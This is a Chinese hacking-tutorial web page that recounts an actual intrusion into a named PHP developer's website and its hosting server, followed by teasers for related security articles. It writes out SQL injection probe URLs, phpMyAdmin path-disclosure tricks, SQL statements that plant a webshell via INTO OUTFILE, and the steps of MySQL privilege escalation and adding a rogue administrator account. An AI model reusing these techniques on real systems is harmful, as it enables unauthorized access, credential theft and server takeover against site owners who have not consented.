看黑客是如何黑了落伍者的(图)

所属分类: 网络安全 / 黑客教程 阅读数: 959
收藏 0 赞 0 分享
前天,听说落伍分类信息程序发布了,就想前去看看,什么样子的.一看,真不愧是落伍的产品,风格依然落伍,功能还行,大体一看没什么漏洞.
看看服务器吧.ping demo.im286.com返回IP 58.253.71.241打开是个"Directory Listing Denied",没意思.不喜欢.
再看看开发者的站,www.php.com.cn,域名真不错,ping一下吧.返回Pinging phper.xihuidc.com.cn [58.253.71.241],看出门道来了,CNAME啊.而且一看域名xihuidc,这个IDC有点2.CNAME的确便于管理,但是这样不太好.
ping的同时我也打开了php.com.cn的站点,哟,"Powered by ebcms",先来检测下注入吧.
http://www.php.com.cn/?do=index&cid=3'
http://www.php.com.cn/?do=news&id=4'
这两个猪点不仅出错了,而且返回了物理地址.D:\public_html\php.com.cn\wwwroot\libraries\syslib\drivers\driver.mysql.php(这个地址很重要哦)
本来想,有猪点,射管理员密码出来,进后台不就得了吗,读出密码一看,傻眼了.crypt加密的,DZ那边的数据也读出来了.鱼也够BT的,密码暴不出来,而且只登录过一次...(这个也很重要,细节.)
因为在检测的时候发现是mysql的root,直接找工具pangolin,读文件吧,怎么读文件也是很有技巧的,这里不多说,读到setting.php,终于读到root的密码了.

现在就开始猜phpmyadmin的路径了,这个倒是很顺利.
http://phper.xihuidc.com.cn/phpmyadmin/,然后就很简单了.暴路径,暴路径我给大家几个办法:
引用
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
路径出来了.E:\phpMyadmin\phpmyadmin\libraries\select_lang.lib.php

写个shell进去.
Create TABLE tmdsb(shell text NOT NULL);
Insert INTO tmdsb (shell) VALUES('test');
select shell from tmdsb into outfile 'E:\phpMyadmin\phpmyadmin\libraries\php.php';
Drop TABLE tmdsb;
有个小马就好办了,再传个大马进去.发现每个磁盘根目录都不能浏览,甚至跳到D:\public_html\php.com.cn\wwwroot\这里也跳不过去,只能在phpmyadmin的目录溜达,这里表扬下IDC,做的不错.看看C:\Progra~1,没有SERV-U,不能用Serv-U提权了,上传一个su.php,由于MYSQL是以系统权限安装的,(在WINDOWS服务管理里面可以看到,是以服务加载的)所以,这里我考虑用MYSQL提权,如图:
(这个shell里的我给拼错了,select和cmdshell,直接导致我以为服务器net.exe做了限制...其实没有...)


修改用户k666.com的密码,并添加到管理员组,成功登陆服务器.
更多精彩内容其他人还在看

大势至共享文件管理系统的比较优势,专业的共享数据权限设置工具、公司共享文件管理系

对于管理文件服务器内的共享文件,给不同用户和不同共享文件设置操作权限,这是一项极其复杂并且难实现的技术,目前国内很少有软件厂商开发这类产品。经网友推荐,了解到一款名为“大势至服务器共享文件管理系统”的软件,是专门管理服务器共享文件的,这款软件不改变共享文件... 查看详情
收藏 0 赞 0 分享

大势至电脑文件加密系统简介、大势至电脑文件加密系统优势

企事业单位员工,在日常工作过程中积累的重要文件,如客户资料、技术秘密、源代码、大量的图纸、技术文档等资料,这些资料都是公司的命脉和竞争砝码,如果被非法流出,将对公司造成重大损失,甚至会使某些新产品的研制计划夭折,因此加强对图文档的保密就变得非常重要了。 文件的泄密途径很多,比如... 查看详情
收藏 0 赞 0 分享

黑客技术入门 十个常用破解网络密码的方法

个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果,例如网络银行的存款被转账盗用,网络游戏内的装备或者财产被盗,QQ币被盗用等等,增强网民的网络安全意识是网络普及进程的一个重要环节,因此,在网民采取安全措施保护自己的网络密码之前,有必要了... 查看详情
收藏 0 赞 0 分享

什么是恶意网站?详解2016最新的钓鱼、黑客入侵、木马病毒教程

当我们在访问一些网站是会弹出一些提示,有时候QQ管家、金山毒霸是经常弹出访问提示,不注意就会扣掉很多钱,那么真正的恶意网站又是怎么一回事,又有多少人彻底的明白呢?一起来看看吧。 | 前言 恶意网站在大家平时网络生活应该不少接触,比如,QQ聊天窗口的安全提示,百度搜索结果... 查看详情
收藏 0 赞 0 分享

如何手工查找后门木马?手工查木马教程

后门木马又称特洛伊木马(Trojan horse),是一种基于远程控制的黑客工具。包括客户端和服务端。一起来看看手工查找后门木马的教程吧。 1、首先最需要注意的地方是系统的启动项,可以在“运行”-输入“msconfig命令”在... 查看详情
收藏 0 赞 0 分享

详解简单的反黑客远程控制的方法(后门程序)

后门程序是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。一般在软件开发时,程序员会在软件中创建后门程序,这样就可以修改程序设计中的缺陷。但是,如果这些后门被其他人知道,或是在发布软件之前没有删除后门程序,那么它就成了安全风险,容易被黑客当成漏洞进行攻击。通俗的讲,后门程... 查看详情
收藏 0 赞 0 分享

详解DDoS工具 一款流行DDoS木马工具

DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的,词文章主要是针对那些对一种被大量肉鸡使用,面向目标IP发起DDoS攻击的木马工具。 本篇文章是对一种被大量肉鸡使用,面向目标IP发起DDoS攻击木马工具的详细分析。 一 背景 近期,阿里云云盾安全... 查看详情
收藏 0 赞 0 分享

十一个步骤让你了解黑客是如何一步步攻击我们的 防御措施

黑客最早源自英文hacker,原指热心于计算机技术,水平高超的电脑专家,尤其是程序设计人员。但如今,黑客一词已被用于泛指那些专门利用电脑网络搞破坏或恶作剧的家伙. 安全公司 Aorato 的一项新研究显示,个人可识别信息(PII)和信用卡及借记卡数据在今年年初的 Target ... 查看详情
收藏 0 赞 0 分享

DiskFiltration电脑没联网,黑客也能靠硬盘窃取电脑数据文件

  震惊!震惊!现在电脑在没有网络的状态下也照样会被黑,黑客也能靠硬盘震动窃取数据,这里聚合整理并实时更新相关资讯,一起来看看吧。   一些公司和政府机构,会确保涉密电脑与外界彻底隔绝,连互联网都不接。但现在有人找到办法把数据传出来。   最近以色列本古里安大学的研究人... 查看详情
收藏 0 赞 0 分享

详解黑客最喜欢使用的三种关机方式 黑客的关机图文视频教程

最近有用户反应,有没有快速关机的方法,最好是黑客使用的方式,这样对以后关机就不用等待那么长时间了,一起来看看吧 黑客关机方法视频教程: 第一种:在桌面建立一个关机按钮,鼠标点击右键新建-快捷方式然后如图 然后在这里输入shutdown -s -t 0,PS:0代... 查看详情
收藏 0 赞 0 分享
查看更多